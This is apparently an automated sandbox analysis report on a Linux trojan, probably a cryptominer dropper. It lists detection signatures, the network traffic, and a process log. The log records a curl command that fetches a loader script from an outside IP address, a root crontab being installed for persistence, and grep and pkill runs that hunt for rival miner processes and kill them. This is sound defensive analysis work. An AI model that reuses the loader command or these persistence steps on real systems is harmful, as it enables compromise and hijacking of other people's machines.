Linux Analysis Report

Overview

General Information

Analysis ID: 1430789
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Deletes security-related log files
Executes the "crontab" command typically for achieving persistence
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using cron
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Deletes log files
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "grep" command used to find patterns in files or piped streams
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Removes protection from files
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Source: /usr/bin/pkill (PID: 6238) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6239) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6242) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6243) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6244) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6247) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6248) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6251) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6253) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6254) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6276) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6277) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6278) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6281) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6282) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6283) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6286) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6287) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6288) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6291) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6292) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6295) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6296) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6297) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6298) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6301) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6303) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6306) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6309) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6310) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6311) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6314) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6315) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6318) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6319) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6320) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6323) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6324) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6325) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6328) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6329) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6330) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6333) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6334) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6336) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6339) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6340) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6341) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6344) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6345) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6348) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6349) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6352) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6353) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6355) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6358) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6359) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6360) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6363) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6365) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6370) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6371) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6372) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6373) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6376) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6377) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6378) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6381) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6382) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6383) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6386) Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking

barindex
Source: unknown Network traffic detected: HTTP traffic on port 57658 -> 9991
Source: unknown Network traffic detected: HTTP traffic on port 9991 -> 57658
Source: unknown Network traffic detected: HTTP traffic on port 57660 -> 9991
Source: unknown Network traffic detected: HTTP traffic on port 9991 -> 57660
Source: global traffic TCP traffic: 192.168.2.23:57658 -> 92.60.39.76:9991
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: unknown TCP traffic detected without corresponding DNS query: 92.60.39.76
Source: global traffic HTTP traffic detected: GET /ldr.sh HTTP/1.1Host: 92.60.39.76:9991User-Agent: curl/7.68.0Accept: */*
Source: global traffic HTTP traffic detected: GET /cron HTTP/1.1Host: 92.60.39.76:9991User-Agent: curl/7.68.0Accept: */*
Source: bash, 8310.1.000000c000000000.000000c000400000.rw-.sdmp String found in binary or memory: https://www.dblikes.top
Source: bash, 8310.1.000000c000000000.000000c000400000.rw-.sdmp String found in binary or memory: https://www.dblikes.tophttps://www.dblikes.topsourl(.
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: classification engine Classification label: mal60.troj.evad.lin@0/3@0/0

Persistence and Installation Behavior

barindex
Source: /usr/bin/bash (PID: 6229) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /usr/bin/bash (PID: 6231) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Source: /usr/bin/cat (PID: 6232) File: /proc/6232/mounts Jump to behavior
Source: /usr/bin/crontab (PID: 6231) File: /var/spool/cron/crontabs/tmp.id5Klo Jump to behavior
Source: /usr/bin/crontab (PID: 6231) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /usr/bin/curl (PID: 6217) Directory: /root/.curlrc Jump to behavior
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/6353/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/6353/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1582/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1582/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/3088/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/3088/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/230/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/230/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/110/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/110/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/231/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/231/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/111/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/111/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/232/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/232/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1579/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1579/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/112/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/112/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/233/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/233/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1699/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1699/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/113/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/113/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/234/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/234/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1335/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1335/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1698/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1698/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/114/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/114/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/235/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/235/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1334/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1334/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1576/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1576/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/2302/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/2302/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/115/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/115/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/236/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/236/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/116/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/116/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/237/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/237/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/117/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/117/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/118/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/118/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/910/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/910/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/119/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/119/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/912/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/912/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/10/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/10/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/2307/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/2307/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/11/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/11/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/918/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/918/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/12/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/12/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/13/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/13/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/14/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/14/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/15/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/15/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/16/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/16/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/17/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/17/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/18/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/18/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1594/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1594/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/120/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/120/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/121/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/121/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1349/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1349/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/1/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/122/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/122/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/243/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/243/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/123/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/123/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/2/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/2/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/124/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/124/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/3/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/3/cmdline
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/4/status
Source: /usr/bin/pkill (PID: 6353) File opened: /proc/4/cmdline
Source: /bin/sh (PID: 6217) Curl executable: /usr/bin/curl -> curl http://92.60.39.76:9991/ldr.sh Jump to behavior
Source: /usr/bin/bash (PID: 6234) Grep executable: /usr/bin/grep -> grep -P /proc/\\d+ Jump to behavior
Source: /usr/bin/bash (PID: 6235) Grep executable: /usr/bin/grep -> grep -Po \\d+ Jump to behavior
Source: /usr/bin/bash (PID: 6393) Grep executable: /usr/bin/grep -> grep [0-9]
Source: /usr/bin/bash (PID: 6395) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6397) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6398) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6399) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1/exe
Source: /usr/bin/bash (PID: 6401) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6403) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6404) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6405) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/10/exe
Source: /usr/bin/bash (PID: 6408) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6410) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6411) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6412) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/100/exe
Source: /usr/bin/bash (PID: 6414) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6416) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6417) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6420) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/101/exe
Source: /usr/bin/bash (PID: 6422) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6424) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6425) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6426) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/102/exe
Source: /usr/bin/bash (PID: 6428) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6430) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6431) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6432) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/103/exe
Source: /usr/bin/bash (PID: 6434) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6436) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6437) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6438) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/104/exe
Source: /usr/bin/bash (PID: 6440) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6442) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6443) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6444) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/105/exe
Source: /usr/bin/bash (PID: 6446) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6448) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6449) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6450) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/106/exe
Source: /usr/bin/bash (PID: 6452) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6454) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6455) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6456) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/107/exe
Source: /usr/bin/bash (PID: 6458) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6460) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6461) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6462) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/108/exe
Source: /usr/bin/bash (PID: 6464) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6466) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6467) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6468) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/109/exe
Source: /usr/bin/bash (PID: 6472) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6474) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6475) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6476) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/11/exe
Source: /usr/bin/bash (PID: 6478) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6480) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6481) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6482) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/110/exe
Source: /usr/bin/bash (PID: 6484) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6486) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6487) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6488) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/111/exe
Source: /usr/bin/bash (PID: 6490) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6492) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6493) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6494) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/112/exe
Source: /usr/bin/bash (PID: 6496) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6498) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6499) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6500) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/113/exe
Source: /usr/bin/bash (PID: 6503) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6505) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6506) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6507) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/114/exe
Source: /usr/bin/bash (PID: 6509) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6511) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6512) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6513) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/115/exe
Source: /usr/bin/bash (PID: 6515) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6517) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6518) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6519) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/116/exe
Source: /usr/bin/bash (PID: 6521) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6523) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6524) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6525) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/117/exe
